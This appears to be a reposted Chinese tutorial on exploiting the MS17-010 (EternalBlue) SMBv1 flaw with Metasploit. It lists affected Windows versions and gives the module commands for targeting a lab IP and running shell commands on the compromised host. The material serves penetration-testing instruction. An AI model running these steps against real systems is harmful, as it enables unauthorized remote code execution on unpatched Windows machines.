安基网 首页 安全 渗透测试 查看内容

Metasploit -- MS17-010(永恒之蓝)漏洞利用

2020-5-15 14:14| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 直到后来看到你恋爱的样子,才知道你从来没真正喜欢过我。。。。。---- 网易云热评一、漏洞简介MS17-010是一个安全类型的补丁,MS17-010更新修复了Microsoft Windows中的漏洞。如果攻击者向Microsoft服务器消息块1.0(SMB v 1)服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。201 ...

直到后来看到你恋爱的样子,才知道你从来没真正喜欢过我。。。。。

---- 网易云热评

一、漏洞简介

MS17-010是一个安全类型的补丁,MS17-010更新修复了Microsoft Windows中的漏洞。

如果攻击者向Microsoft服务器消息块1.0(SMB v 1)服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。

2017年, The Shadow Brokers决定公开一部分有价值的工具, 其中”eternal blue”(永恒之蓝) 就是其中之一(漏洞编号ms 17-010) Eternal blue通过TCP端口445和139来利用SMB v 1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器, 无需用户任何操作, 只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、漏洞影响

目前已知受影响的Windows版本包括但不限于:WindowsNT, Windows 2000、WindowsXP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008R 2、Windows Server 2012SPO。

三、漏洞利用

1、打开Metasploit,搜索ms17-010可利用模块,search ms17-010

2、选择模块use exploit/windows/smb/ms17_010_eternalblue

3、查看需要设置的参数show options

4、设置攻击目标set rhosts 192.168.1.129

5、run,攻击


6、输入systeminfo,查看系统

7、解决乱码,输入 chcp 65001


禁止非法,后果自负

欢迎关注公众号:web安全工具库



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6826708712036499980/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部